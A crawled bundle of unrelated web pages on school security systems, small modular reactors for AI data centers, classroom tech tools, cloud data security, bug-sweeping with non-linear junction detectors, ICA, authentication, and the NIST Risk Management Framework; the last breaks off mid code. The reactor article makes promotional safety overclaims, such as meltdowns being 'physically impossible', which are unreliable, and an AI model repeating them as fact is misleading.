In today's world, ensuring the safety and security of students and staff within educational institutions has become a paramount concern. While traditional security measures, such as security personnel and surveillance cameras, remain important, the integration of advanced security technologies is essential to create a safer learning environment.
Access Control Systems
Access control systems have evolved significantly over the years and have become a fundamental component of school security. These systems allow schools to regulate who can enter the premises, ensuring that only authorized individuals gain access. Modern access control systems incorporate features such as biometric scans, smart cards, or keyless entry methods, making it difficult for unauthorized personnel to enter the premises.
Video Surveillance
Video surveillance is a well-established technology in the realm of school security. However, with advancements in camera technology and video analytics, it has become even more powerful. High-definition cameras with night vision capabilities, along with intelligent video analytics, can provide real-time monitoring, instant alerts, and the ability to track suspicious activities. Video surveillance can deter potential threats and provide valuable evidence in the event of an incident.
Intrusion Detection Systems
Intrusion detection systems (IDS) are designed to identify unauthorized entry or suspicious activities within the school premises. These systems employ various sensors and detectors to monitor doors, windows, and other entry points. When triggered, IDS can alert security personnel or automatically lock down the building to prevent intruders from gaining access.
Panic Buttons and Emergency Alert Systems
Instant communication during emergency situations is crucial. Panic buttons and emergency alert systems enable school staff to quickly notify authorities and initiate lockdown procedures in the event of a threat. These systems can also disseminate alerts to students, teachers, and parents, providing essential information and guidance in critical situations.
Visitor Management Systems
Maintaining control over who enters the school campus is a fundamental aspect of security. Visitor management systems help schools keep track of everyone on the premises. These systems can scan IDs, verify visitor credentials, and maintain records of all individuals entering the school. This not only enhances security but also ensures the safety of students and staff.
Mass Notification Systems
During emergency situations, it’s vital to disseminate information rapidly. Mass notification systems can send out alerts via various channels, including SMS, email, social media, and intercom announcements. These systems ensure that everyone within the school community is informed and can take appropriate actions in response to threats or emergencies.
Biometric Identification
Biometric identification methods, such as fingerprint or facial recognition, offer an additional layer of security. These systems can be used to control access to secure areas or track attendance, making it difficult for unauthorized individuals to impersonate students or staff.
Cybersecurity Measures
In today's digital age, cybersecurity is just as essential as physical security. Schools store a wealth of sensitive information, and protecting this data from cyber threats is critical. Robust cybersecurity measures, including firewalls, intrusion detection, and regular security audits, are essential for safeguarding the school's digital infrastructure.
Social Media Monitoring
Monitoring social media platforms can provide early warnings about potential threats or incidents. Schools can use social media monitoring tools to track mentions of their institution, students, or staff, enabling them to respond swiftly to any emerging concerns.
TRUST THE PROFESSIONALS AT ARK SYSTEMS
Located in Columbia, Maryland, ARK Systems provides unsurpassed quality and excellence in the security industry, from system design all the way through to installation. We handle all aspects of security with local and remote locations. With over 30 years in the industry, ARK Systems is an experienced security contractor. Trust ARK to handle your most sensitive data storage, surveillance, and security solutions. | <urn:uuid:cd21247c-230d-4e67-b00d-a1133b010ac9> | CC-MAIN-2024-38 | https://www.arksysinc.com/blog/enahncing-school-security-essential-technologies-for-a-safer-learning-environment/ | 2024-09-15T22:37:28Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651668.26/warc/CC-MAIN-20240915220324-20240916010324-00420.warc.gz | en | 0.921856 | 745 | 2.96875 | 3 |
Insight and analysis on the data center space from industry thought leaders.
AI’s Power Problem and How To Fix It
By using SMRs, data centers can achieve energy independence. This energy source holds the key to unlocking the full potential of AI.
July 18, 2023
AI is going to transform society as radically as harnessing electricity did. AI promises to increase productivity, decrease car accidents, help diagnose and treat disease with speed and precision, and streamline industrial processes to give us a cleaner environment.
But AI can fulfill its potential only if the data centers that run AI can access enough energy. And data centers are already struggling to find enough energy. Right now, energy bottlenecks in northern Virginia – the largest data center hub in the world – could delay new development into 2026. Demand for power has outgrown the capacity of existing power lines, and the resulting congestion is choking the supply of electricity to data centers. Adding AI into the mix will exacerbate these problems because a lot of energy is needed to train and operate AI models.
On top of that, the U.S. Environmental Protection Agency (EPA) is imposing strict emission limits on power plants. PJM (a grid operator serving 65 million people in 13 Mid-Atlantic and Midwest states) says fossil-fuel power plants are retiring much faster than alternative energy sources are getting developed. So data center developers will face energy shortages and must use low-emission energy sources to build new capacity.
Data centers can’t be built just anywhere. They need to be sited near power plants that have adequate transmission lines because it could take more than a decade to construct lines to move electricity from remote locations. They also have to be close to population centers where people are most likely to use their digital services and near other data centers to ensure easy exchange of information. Finally, they need to be built where the public will support them. Many communities oppose the construction of new data centers because they fear the facilities will leave less electricity for residents and local businesses.
Although solar and wind are in-vogue energy solutions, neither is reliable enough to power a data center because both depend on the weather. Data centers support our most critical systems – hospitals, national defense, GPS, communication, traffic lights, water, and wastewater treatment – so they need energy 24/7/365 in every type of weather and every type of circumstance. Plus, large solar and wind plants are sited in remote locations rather than in the population hubs where data centers are commonly located.
Natural gas and coal are reliable power sources, but new EPA air-quality restrictions make it hard to get permits for new fossil-fired power plants.
Nuclear power can meet all the energy needs of data centers: It’s reliable, affordable, and clean. But large nuclear plants require large up-front investments and take a long time to build. New reactors in Georgia ran $16 billion over budget and six years behind schedule, and few U.S. utilities are willing to take on that level of capital risk.
But there is a solution. Companies are working to help data centers overcome energy bottlenecks with small modular reactors (SMRs). SMRs have all the benefits of large nuclear plants, but they’re faster and much less expensive to build. Plus, SMRs can be designed to recycle spent fuel – both their fuel and fuel from large nuclear plants.
SMRs are the safest nuclear plants ever designed. They can cool themselves without relying on people, pumps, or mechanical systems to remove heat. Meltdowns are a thing of the past. The types of accidents that happened at Chornobyl, Fukushima, and Three Mile Island are physically impossible.
Plus, SMRs can be sited almost anywhere. They have a small footprint—about two acres for the smallest reactors. By contrast, traditional reactors require on average 800 acres of land. And since most SMRs don’t use water for cooling, they don’t have to be sited near a lake, river, or ocean. They can be installed on the site of a data center or at a nearby location in under a year.
SMRs are also affordable. Off-the-shelf components and factory prefabrication allow SMRs to provide power at competitive prices in most parts of the U.S. Perhaps best of all, developers do not need to risk capital because some SMR companies offer power purchase agreements (PPAs).
SMRs offer data centers a path to energy independence – one that avoids bottlenecks in the grid and competition for energy with local communities. This key energy source can provide the power to unlock the benefits of AI and transform modern society.
About the Author
You May Also Like | <urn:uuid:2c1aecab-180c-4665-99c5-d183ac90580d> | CC-MAIN-2024-38 | https://www.datacenterknowledge.com/ai-data-centers/ai-s-power-problem-and-how-to-fix-it | 2024-09-15T22:49:43Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651668.26/warc/CC-MAIN-20240915220324-20240916010324-00420.warc.gz | en | 0.944196 | 970 | 2.6875 | 3 |
If you follow me on twitter, you are probably very well aware of my rough ride in my summer class. So, my final paper has been handed in, and I have been mulling over what I can take away from this experience. This may turn into more than one post, but I think it’s important.
We all know that things are changing fast as far as education is concerned. All of a sudden, instructors have access to all sorts of tools. In this class alone, we were required to use the following instructional tools:
- Online readings
- A book (yes a normal book – I am listing ALL of the tools)
- Screenhunter (I used Snagit)
- We had to create a website (I used vi)
- My group used meebo to meet (Blackboard is not so great with synchronous communications)
- My group used slideshare
That is a lot of tools! That should be great, right? In theory, educators now have lots of inexpensive tools that can be used to make their students' learning experiences more meaningful.
The “more meaningful” bit is where it gets tricky. In order for instruction using these technical tools to be meaningful, strong design must go into the instruction. Without this design, students will be frustrated and refuse to use the tools, and this arsenal of new tools we have available to apply to instruction will become useless.
I am at an advantage here; I work in a group that creates technical training for our customers, partners, and internal personnel. I know what has to go into planning reusable technical labs that allow students to use all their cognitive powers to concentrate on lesson objectives (and not on learning yet another tool).
This is a critical point: it places an unfair cognitive burden on students when you expect them to learn new technical tools at the same time they are learning new lesson materials. You must either make the technology invisible, or teach them how to use the technology.
Here are things that need to be thought about when designing a class using these technical tools:
- Just because it was easy for you to pick up one of these new Learning 2.0 tools doesn't mean that it will be as easy for your students. You must provide instruction for the tools for those students who need it.
- Will it run on all operating systems? If you have a PC, will this new software run on a Mac?
- Does the software have minimum requirements? Will it run on all versions of Windows? Mac? All the flavors of Linux? Does it require Microsoft Office products, or can it run on OpenOffice? Do you need a certain amount of memory? You should really let your students know about this before the class starts, so they have a chance to tune up their computers.
- Are there clear instructions available on how to access/install/use the software? If not, you need to write these instructions before the class runs. Don't expect the learners to just figure it out, especially if this is not a class on how to access/install/use this software.
- Are there security considerations to using the software? As much as I like Diigo, it's not something I could design into my courses because of confidentiality agreements.
- Be available during the assignment window to help with technical questions. If you are going to require students to use these tools, plan on being very available during the assignment periods. If assignments are due on Thursday nights, you will probably get lots of questions Thursday afternoon. (You could probably address this need with a wiki.)
- Do not burden the technical students in the class with being the technical mentors. Your techie students probably won't mind helping, but they did not take the class to sharpen their technical skills. If they are helping other students learn the technology, they are being robbed of learning time. That's not really fair.
- Be sure to keep the technical documentation up to date. Again, a wiki may come in very handy here.
In short, the stuff I learned in this class was not on the syllabus. It occurred to me I am probably the worst student possible for this class. I hope this post didn’t come across as too negative.
So what do you think? Am I completely off-base? Did I leave any good planning advice out of my list? | <urn:uuid:a5c94dce-3bdb-4641-948e-7953476052c8> | CC-MAIN-2024-38 | https://blog.ginaminks.com/lessons-i-learned-from-my-summer-class/ | 2024-09-20T23:36:07Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725701425385.95/warc/CC-MAIN-20240920222945-20240921012945-00020.warc.gz | en | 0.953461 | 908 | 2.5625 | 3 |
Data Security in Cloud Computing
Cloud computing is a collection of IT resources accessible over the internet. These resources include infrastructure, data storage, applications, networking and software. Primarily, there are two types of clouds — public and private. Cloud computing allows workforces to access data from virtually anywhere, though this can also raise several data security concerns.
Securing a cloud environment is a shared responsibility between the cloud provider and the consumer. The cloud provider is often responsible for securing physical assets such as data centers, physical servers, and network switches and routers, while you're responsible for securing data storage, your data, and access to your systems and applications.
It’s your responsibility to secure data on the cloud. Cloud data security is the practice of protecting data and other digital assets from security threats. Learn more about how to secure your data in the cloud and reap the benefits of cloud computing securely.
What Is Cloud Data Security?
Data security in the cloud is a challenge that stems from the unique risks that technology brings as traditional network perimeters disappear. Data security in cloud computing requires a different approach — one that considers both the complexity of data and security models in the cloud.
Cloud data security involves implementing policies, procedures, technologies, controls and services to protect data, applications, users and systems in the cloud. A strong cloud data security strategy must include all aspects of protecting data, including:
- Data in use: Use proper authentication and access controls to secure data being accessed through an application or an endpoint.
- Data in transit: Protect in-transit data while it's moving through the network using strong transport encryption such as TLS (see the sketch after this list).
- Data at rest: Secure stored data through proper access restrictions, user authentications and encryption.
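For data in transit, a minimal sketch (Python standard library only; example.com stands in for a real host) shows what wrapping a connection in TLS looks like:

```python
import socket
import ssl

context = ssl.create_default_context()  # verifies server certificates

with socket.create_connection(("example.com", 443)) as raw_sock:
    with context.wrap_socket(raw_sock, server_hostname="example.com") as tls:
        print(tls.version())  # e.g. 'TLSv1.3'
        # Everything sent through `tls` is encrypted on the wire.
        tls.sendall(b"HEAD / HTTP/1.1\r\nHost: example.com\r\n\r\n")
        print(tls.recv(120).decode(errors="replace"))
```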
To ensure this level of protection, security solutions should provide privacy across your networks, applications and other cloud environments. You should also have control over data access and complete visibility over all the data in your network, including in the cloud. Cloud data security solutions should also help you maintain data confidentiality, integrity and availability.
Cloud data security is essential for preventing data from being lost, stolen, damaged or otherwise compromised, any of which can have significant consequences for your business. Understanding the need for data security in cloud computing improves your ability to safeguard your business's data.
Benefits of Data Security in Cloud Computing
Data security is essential in protecting your business data on the cloud. Consider these benefits of having data privacy and security in cloud computing.
1. Improved Regulatory Compliance
Data security solutions safeguard your sensitive data and help you comply with industry standards and regulations. Failure to maintain regulatory compliance may result in consequences like fines, loss of business, and reputational damage. Industry-specific data security solutions and managed services typically provide effective regulatory compliance.
2. Increased Visibility
Visibility refers to your ability to monitor data across your network. Cloud data security allows you to gain visibility into areas you previously could not monitor and improve how you manage risks. Many cloud security services offer constant cloud monitoring of all your assets in the cloud. Increased cloud visibility increases the likelihood of identifying security risks before they materialize.
3. Lifecycle Protection
A cloud data security solution helps protect your data through its entire lifecycle, from cradle to grave. This ensures your data is protected through every stage rather than just storage.
4. Proactive Management
With increased visibility comes proactive threat management. Because cloud security allows you to identify security risks quickly, your IT team or managed service provider can immediately address the threat and mitigate data risks. Proactive threat management is essential because the longer threats go unmanaged, the more data can be compromised.
Security Issues With Cloud Computing
A common misconception about cloud computing is that it’s less secure than a physical data center. Realistically, cloud computing can be as secure as a physical server if it’s equipped with a proper cybersecurity strategy. This is where many companies experience security issues because they don’t realize cloud data requires updated security requirements.
Here are a few potential security issues you may encounter with the cloud:
- Data breaches and misconfigurations: Cloud data breaches often begin with stolen credentials, obtained through weak passwords or other exploited vulnerabilities. Similarly, attackers take advantage of misconfigurations (security gaps left by incorrect settings) to cause data breaches, allowing private data into the wrong hands.
- Unauthorized access: Whether malicious or accidental, lack of access control allows unauthorized users to access private data. In regulated industries, any unauthorized access is considered a breach. Insider threats use their access for the wrong reasons, leaking data from the inside.
- Unsecured APIs: An application programming interface (API) allows two applications to communicate and work together. When using APIs to transfer data to suppliers or partners, data can be exposed if API endpoints are unsecured.
If properly secured mechanisms are put in place to safeguard an organization’s data, cloud computing can offer great benefits.
Cloud Data Security Best Practices
A cloud data security strategy made up of the right policies and procedures can provide strong data assurance. Consider these best practices to maximize your cloud data security.
1. Encrypt Your Data
Encrypt data with appropriate encryption protocols at all levels, both while data is at rest and while it is in motion, across all databases and secure file shares. An application must authenticate itself and provide the decryption key before data is decrypted and made available to an authorized user.
Good data storage hygiene, such as detecting and eliminating misconfigured data buckets on the cloud, and terminating orphan resources, also further helps improve security.
2. Prioritize Granular, Policy-Based Identity and Access Management, and Authentication Controls
Identity and access management is a data privacy tool in cloud computing that gives you more control over user access and privileges. Be sure to design security around groups and roles rather than individuals, to make changes easier when business requirements change. Grant only minimal access privileges to the essential assets and APIs. Enforce strong password policies, permission time-outs and other authentication best practices.
3. Implement Multi-Factor Authentication
Cloud security providers offer multi-factor authentication (MFA) to strengthen your security measures. MFA requires users to input additional identifying information with their login credentials to ensure the user logging in is who they say they are.
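As a small illustration of one common MFA factor (assuming Python and the third-party pyotp library), a time-based one-time password (TOTP) can be generated and checked like this:

```python
import pyotp

secret = pyotp.random_base32()  # shared once with the user's authenticator app
totp = pyotp.TOTP(secret)

code = totp.now()         # the six-digit code the user's app displays
print(totp.verify(code))  # True while the code's time window is valid
```

The server stores only the shared secret; the short-lived code proves the user holds the enrolled device.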
4. Safeguard Applications With Next-Generation Web Application Firewall
A next-generation web application firewall inspects and controls traffic to and from web application servers, and it automatically updates its rules in response to changes in traffic behavior.
Protect Your Cloud Data With Contigo Technology
Contigo Technology has the IT solutions for you, whether you’re looking for cybersecurity or cloud computing services. Third-party providers like us offer significantly more flexibility at an affordable price. Managed cloud and cybersecurity services provide peace of mind and leave more time for you to manage your team.
Our highly experienced and knowledgeable team will consult with you to customize solutions and meet your business’s needs. Contact us to learn how we can help you protect your cloud data. | <urn:uuid:6fd541fc-4f0d-4f4c-8523-a398cfc14a8b> | CC-MAIN-2024-38 | https://www.contigotechnology.com/blog/data-security-in-cloud-computing/ | 2024-09-21T00:56:57Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725701425385.95/warc/CC-MAIN-20240920222945-20240921012945-00020.warc.gz | en | 0.909726 | 1,441 | 3.15625 | 3 |
Non-Linear Junction Detection (NLJD) helps our technical consulting team locate spycams and other bugging devices even when they are turned off, and even if the batteries are dead.
How does a non-linear junction detector work?
A Non-Linear Junction Detector operates somewhat like the shoplifting detectors used by retailers. There, antennas near the doorways listen for a reflected signal from a shoplifting tag attached to an item. Interestingly, shoplifting tags do not contain batteries. They are simple devices that only contain an antenna and a diode.
Diodes are made by joining two dissimilar semiconductor materials. This creates what is called a non-linear junction. Transistors are made the same way. Non-linear junctions are the building block of all modern electronic devices, including bugs, recorders, and spycams.
How do you detect electronic devices?
When non-linear junctions are exposed to a strong radio signal, they reflect some of the original signal at twice the frequency! This phenomenon allows large areas to be scanned quickly in pursuit of the altered signal. The actual process is similar to sweeping a room with a flashlight beam. With the proper training and practice, technical specialists use these sweeps to detect and locate the origin of all re-radiated signals.
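A small numerical sketch (Python with NumPy; the diode-like response y = x + 0.5x^2 and the frequencies are illustrative, not a model of any real detector) shows where the doubled frequency comes from:

```python
import numpy as np

fs, f0 = 10_000, 100                 # sample rate and probe frequency (Hz)
t = np.arange(0, 1, 1 / fs)
probe = np.sin(2 * np.pi * f0 * t)   # the strong radio signal
reflected = probe + 0.5 * probe**2   # non-linear (diode-like) response

spectrum = np.abs(np.fft.rfft(reflected))
freqs = np.fft.rfftfreq(len(t), 1 / fs)
for f in (f0, 2 * f0):
    idx = np.argmin(np.abs(freqs - f))
    print(f"{f} Hz component: {spectrum[idx]:.0f}")
# The 2*f0 line exists only because of the squared (non-linear) term;
# a purely linear reflector would return energy at f0 alone.
```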
Non-linear junction detectors are also excellent at finding lost remote controls; very much appreciated when we are at our clients’ residences.
Why use Non-Linear Junction Detectors as a part of a TSCM (Technical Security Counter Measures) inspection?
Non-Linear Junction Detection is a non-destructive detection technique that sees through solid objects. This eliminates the intrusive disruption a physical search sometimes requires, like checking shelves full of books. More importantly, the Non-Linear Junction Detector speeds up the detection process dramatically. Speed allows us to evaluate your location expeditiously. It also allows our services to be more cost-effective for you.
It is always a very good idea to know who is listening in on private corporations, and who may have unauthorized access to information and trade secrets. As one manufacturer of Non-Linear Junction Detectors explains, NLJDs were developed first for use in embassies and diplomatic settings, and quickly established their “reputation as perfect means of counter-espionage.”
Have a Question About TSCM?
If you have any questions about Non-Linear Junction Detection (NLJD) or the TSCM consulting services provided by Murray Associates, simply fill out the form below, or call us from a safe area and phone.
If you think you are under active electronic surveillance, or believe you have discovered a bug or covert video camera, go to our Emergency TSCM page. The procedural checklist there will tell you exactly what you need to do next. | <urn:uuid:0f1d8344-2d7f-49db-b5ca-7c186b7e258e> | CC-MAIN-2024-38 | https://counterespionage.com/tscm-technology/non-linear-junction-detection-nljd/ | 2024-09-07T14:35:12Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700650883.10/warc/CC-MAIN-20240907131200-20240907161200-00320.warc.gz | en | 0.941906 | 581 | 2.546875 | 3 |
Definition: Independent Component Analysis (ICA)
Independent Component Analysis (ICA) is a computational technique used to separate a multivariate signal into additive, independent components. It is commonly applied in the fields of signal processing and data analysis to identify underlying factors or components from multivariate statistical data. ICA is based on the assumption that the components are non-Gaussian and statistically independent of each other, making it particularly effective in applications like blind source separation where the goal is to recover independent signals from their mixtures without prior knowledge of the mixing process.
Expanding on the definition, ICA plays a crucial role in extracting meaningful information from complex datasets by identifying components that are maximally independent from each other. This separation process is particularly useful in scenarios where the measurement data is a mixture of several independent sources, and there is a need to isolate these sources for further analysis. The non-Gaussianity criterion is a key aspect of ICA: by the central limit theorem, a mixture of independent sources tends to be more Gaussian than the sources themselves, so maximizing the non-Gaussianity of the recovered components drives them back toward the original independent sources.
Applications of ICA
Independent Component Analysis finds extensive applications across various domains:
- Biomedical Signal Processing: ICA is instrumental in analyzing EEG (electroencephalography) and MEG (magnetoencephalography) data, separating artifacts from neural signals.
- Image Processing: It helps in noise reduction, image enhancement, and feature extraction from images and video sequences.
- Audio Signal Processing: ICA is used for blind source separation tasks, such as separating voices from overlapping audio signals.
- Financial Data Analysis: In finance, ICA can help identify underlying factors affecting stock prices or market trends.
- Telecommunications: It’s applied in separating signals that have been mixed in channels, improving the clarity and quality of received signals.
Benefits of ICA
The benefits of employing Independent Component Analysis include:
- Clarity and Enhancement: By separating mixed signals into independent components, ICA enhances the clarity and interpretability of data.
- Noise Reduction: It effectively isolates noise components from signal data, improving the quality of the analyzed signals.
- Feature Extraction: ICA facilitates the identification of hidden features within data, which can be crucial for pattern recognition and predictive modeling.
- Application Versatility: Its ability to be applied across a wide range of fields and data types makes ICA a versatile tool for researchers and practitioners.
How ICA Works
The underlying principle of ICA involves assuming that the observed data is a linear mixture of independent components. The goal is to find a matrix that, when multiplied by the observed data, yields the independent components. This involves several steps:
- Centering and Whitening: Preprocessing the data so that it has zero mean and an identity covariance (uncorrelated components with unit variance), which simplifies the separation problem.
- Estimating the Mixing Matrix: Using optimization techniques to estimate the matrix that describes how the original signals were mixed.
- Maximizing Non-Gaussianity: Employing measures of non-Gaussianity, such as negentropy, to guide the separation process, as independent components are assumed to be more non-Gaussian than their mixtures.
Real-world Example: Blind Source Separation
A classic application of ICA is in blind source separation, where the task is to separate audio signals that have been mixed together. Imagine recording a conversation with two people speaking simultaneously, using two microphones placed at different locations. Each microphone captures a different mixture of the two speakers’ voices. Using ICA, one can separate these mixed signals into two independent components, each corresponding to one of the speaker’s voice, without prior knowledge of the speakers’ locations or the sound propagation path.
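In the standard model, the recordings are x = As for an unknown mixing matrix A, and ICA estimates an unmixing matrix W so the sources are recovered as Wx. A minimal sketch with scikit-learn's FastICA (synthetic sources and a hypothetical mixing matrix standing in for the two microphones):

```python
import numpy as np
from sklearn.decomposition import FastICA

rng = np.random.default_rng(0)
t = np.linspace(0, 8, 2000)
s1 = np.sin(2 * t)           # "speaker one"
s2 = np.sign(np.sin(3 * t))  # "speaker two" (strongly non-Gaussian)
S = np.c_[s1, s2] + 0.05 * rng.standard_normal((2000, 2))

A = np.array([[1.0, 0.5],    # mixing matrix; unknown in practice
              [0.4, 1.0]])
X = S @ A.T                  # the two "microphone" recordings

ica = FastICA(n_components=2, random_state=0)
S_est = ica.fit_transform(X)  # recovered independent components
print(S_est.shape)            # (2000, 2)
```

Note that ICA recovers sources only up to permutation and scaling: which output corresponds to which speaker, and at what amplitude, is not determined.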
Frequently Asked Questions Related to Independent Component Analysis (ICA)
What Is Independent Component Analysis (ICA) Used For?
ICA is used for separating a multivariate signal into additive, independent non-Gaussian components, commonly applied in signal processing, biomedical data analysis, and financial data analysis to extract meaningful information from complex datasets.
How Does ICA Differ From PCA?
While both ICA and PCA (Principal Component Analysis) are used for dimensionality reduction and feature extraction, PCA focuses on maximizing variance and finds orthogonal components, whereas ICA separates a multivariate signal into statistically independent, non-Gaussian components.
Can ICA Be Used for Noise Reduction?
Yes, ICA can be effectively used for noise reduction by isolating and removing components that are identified as noise from the signal data, thereby enhancing the signal quality.
What Are the Challenges in Applying ICA?
The main challenges include the requirement for statistical independence among components, difficulty in choosing the correct number of components, and the need for large data sets to achieve accurate separation.
How Is Non-Gaussianity Related to ICA?
Non-Gaussianity is a key concept in ICA, as it is used to measure the independence of components. Independent components are assumed to be more non-Gaussian than their mixtures, making non-Gaussianity a guiding principle for separating components.
What Makes ICA Suitable for Blind Source Separation?
ICA is suitable for blind source separation due to its ability to separate mixed signals into independent components without prior knowledge of the source signals or the mixing process, leveraging statistical independence and non-Gaussianity.
Can ICA Be Applied to Non-Linear Mixtures?
Traditional ICA is designed for linear mixtures. However, extensions and variations of ICA have been developed to address non-linear mixtures, though these models are generally more complex and less robust.
Is There a Standard Algorithm for Performing ICA?
There is no single standard algorithm for ICA; various algorithms exist, such as FastICA, Infomax, and JADE, each with its own advantages and suited to different types of data and applications.
How Important Is Preprocessing in ICA?
Preprocessing steps like centering, whitening, and dimensionality reduction are crucial in ICA, as they simplify the problem and enhance the algorithm’s ability to accurately separate independent components. | <urn:uuid:59bd36a1-3bda-4724-935c-3a585d65aae4> | CC-MAIN-2024-38 | https://www.ituonline.com/tech-definitions/what-is-independent-component-analysis-ica/ | 2024-09-07T14:13:18Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700650883.10/warc/CC-MAIN-20240907131200-20240907161200-00320.warc.gz | en | 0.917789 | 1,266 | 3.5 | 4 |
The terms authentication and authorization may sound similar, but they are distinct when it comes to their core functions. Authentication and authorization are security processes that are executed when users try to access their resources. Authentication and authorization play vital roles in preventing cybersecurity breaches and bolstering the security system of an organization.
Authentication is the process of verifying a user’s identity who requires access to resources such as applications, systems, and networks. Access to these resources is only permitted if the user is successfully authenticated after entering the credentials or other modes of authentications such as biometrics.
Authorization is the process of validating the user to check if the user has the privileges to access a specific system, application, or network. Authorization is associated with control of access and user privileges. Factors such as the user’s age, role, and other metadata play an important role in the authorization process.
To access a resource, the user is authenticated first and then authorized.
Password-based authentication
This is an authentication process in which a password is a combination of letters, numbers, and special characters. Users tend to create simple passwords so that they can easily remember them, but this makes their accounts vulnerable to hackers, who gain access by systematically trying different combinations of letters, numbers, and special characters. A long (more than 10 characters) combination of different characters, letters, and numbers is recommended for passwords.
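A quick back-of-the-envelope calculation (Python; 95 is roughly the number of printable ASCII characters, and the guess rate is a hypothetical figure chosen for illustration) shows why length matters so much:

```python
charset = 95
guesses_per_second = 1e10  # illustrative attacker speed
for length in (6, 8, 10, 12):
    combos = charset ** length
    years = combos / guesses_per_second / (60 * 60 * 24 * 365)
    print(f"{length} characters: {combos:.1e} combinations, ~{years:,.0f} years")
```

Each extra character multiplies the attacker's work by the size of the character set, which is why the 10-plus-character recommendation above beats a short but "clever" password.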
Biometric authentication
This is an authentication process that involves utilizing the user's biological information for identity verification. Biometrics are convenient to use and are faster when compared to passwords. Some biometrics used frequently are as follows:
| Biometric | Authentication factor |
| --- | --- |
| Fingerprint recognition | Authentication is based on the unique fingerprint pattern of the user. |
| Facial recognition | Authentication is based on the unique facial characteristics of the user. |
| Retina/iris scanners | Authentication is based on the unique pattern of a person's retina or iris. |
Token-based authentication
Authentication is based on a unique, encrypted string of characters. A token-based authentication application sends this string to the user's smartphone or email, and the user has to enter it to gain access to their resources.
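A minimal sketch of such a flow (Python standard library only; the 300-second validity window is an illustrative choice, and real systems add delivery, rate limiting and single-use enforcement):

```python
import hashlib
import secrets
import time

def issue_code():
    code = secrets.token_urlsafe(6)     # random code sent to the user
    digest = hashlib.sha256(code.encode()).hexdigest()
    return code, (digest, time.time())  # store only the hash server-side

def verify(submitted, record, window=300):
    digest, issued_at = record
    return (time.time() - issued_at <= window and
            hashlib.sha256(submitted.encode()).hexdigest() == digest)

code, record = issue_code()
print(verify(code, record))          # True
print(verify("wrong-code", record))  # False
```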
Multi-factor authentication
Multi-factor authentication involves two or more authentication methods. For example, a user's fingerprint and one-time password (OTP) sent to the user's smartphone are required to log in.
Attribute-based access control (ABAC) authorization is related to a specific user attribute. Information such as age, demographics, and relationships are some attributes of a user. ABAC authorization is executed when the user is trying to access the resources; it requires a specific attribute for granting permissions to the user.
For example, a voting system will only authorize the permission to vote if the user's age is 18 or greater.
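In code, an attribute-based check keys off the user's attributes rather than their identity or role. A tiny sketch of the voting example (Python; the attribute names are hypothetical):

```python
def can_vote(user: dict) -> bool:
    # Permission follows the attribute, not the individual.
    return user.get("age", 0) >= 18

print(can_vote({"name": "Asha", "age": 19}))  # True
print(can_vote({"name": "Ravi", "age": 16}))  # False
```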
Role-based access control (RBAC) authorization is related to the role of the user, not the user directly. In an organization, different users have different roles. In this authorization method, permission to use a resource is only granted if the role of the user has the privilege to access the resource.
For example, the ability to onboard or offboard an employee is only possible if the user account has an HR role.
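A role-based check, by contrast, consults a role-to-permission mapping. A tiny sketch of the HR example (Python; the role and permission names are hypothetical):

```python
PERMISSIONS = {
    "HR": {"onboard_employee", "offboard_employee"},
    "Engineer": {"deploy_code"},
}

def is_authorized(roles, action):
    # Permission follows the role, not the individual.
    return any(action in PERMISSIONS.get(role, set()) for role in roles)

print(is_authorized(["HR"], "onboard_employee"))        # True
print(is_authorized(["Engineer"], "onboard_employee"))  # False
```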
| Authentication | Authorization |
| --- | --- |
| Authentication verifies the user's identity | Authorization checks if the user has the privilege to access the resources |
| Authentication is processed before authorization | Authorization is processed after authentication |
| Visible to the user | Not visible to the user |
| Data for authentication moves as an ID token | Data for authorization moves as an access token |
| The authentication process is managed by user credentials, biometrics, OTPs, or other applications | The authorization process is managed by IT administrators or IT security |
| Authentication processes like login credentials are partially changeable by the user | Authorization settings cannot be changed by the user; they can only be changed by IT administrators or IT security teams |
Technology advances every day, and many organizations are also adapting quickly. IT administrators need to ensure that their organization's security system is updated. The authentication and authorization procedure is a critical component of any security system. When dealing with an organization's sensitive data assets, both authentication and authorization are essential; neglecting either of these processes would leave the organization vulnerable to data breaches and illegal access.
Organizations are gradually moving away from passwords and toward authentication apps and biometrics, which provide a better user experience and better security. There are various types of authentication and authorization methods that can be implemented accordingly to fortify an organization's security system. | <urn:uuid:90aa7622-89a3-442a-9183-b44cc900ee00> | CC-MAIN-2024-38 | https://www.manageengine.com/active-directory-360/manage-and-protect-identities/iam-library/authentication/authentication-vs-authorization.html | 2024-09-08T20:36:59Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651017.43/warc/CC-MAIN-20240908181815-20240908211815-00220.warc.gz | en | 0.932023 | 930 | 3.921875 | 4 |
The National Institute of Standards and Technology (NIST) Risk Management Framework (RMF) is a robust, adaptable method for managing and mitigating information security risks within government agencies and organizations working with government systems. It integrates security, privacy, and cyber supply chain risk management into the system development life cycle. The RMF enables continuous cybersecurity risk management, compliance assurance in diverse environments, and enhanced supply chain and personnel security.
NIST plays a pivotal role in providing guidance and standards for federal agencies and their information systems and organizations. This extends to vital sectors like the Department of Defense (DoD), where robust security measures are essential.
NIST’s comprehensive framework aids federal agencies, including the DoD, in ensuring the security and resilience of their federal information systems. By adhering to NIST’s guidelines and recommendations, federal agencies can strengthen their cybersecurity posture, protect sensitive data, and mitigate risks effectively, aligning their operations with best practices and safeguarding national interests.
The 7 NIST Risk Management Framework Steps
The NIST Risk Management Framework (RMF) consists of seven steps that guide organizations through the RMF process of managing and mitigating risks associated with information security. These steps are as follows:
- Prepare: This step involves preparing the organization to manage security and privacy risks.
- Categorize: This step involves categorizing the system and information based on impact analysis.
- Select: This step involves selecting the set of NIST SP 800-53 controls to protect the system based on risk assessment(s).
- Implement: This step involves implementing the security controls.
- Assess: This step involves assessing the effectiveness of the security controls.
- Authorize: This step involves making risk-based decisions to authorize the system.
- Monitor: This step involves continuously monitoring security controls to ensure they are operating as intended and producing the desired results.
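As a rough illustration of how the Categorize, Select, and Monitor steps fit together (Python; the control IDs follow NIST SP 800-53 naming, but the checks are placeholders, not real assessments):

```python
system = {
    "name": "payroll-app",
    "impact": "moderate",       # output of the Categorize step
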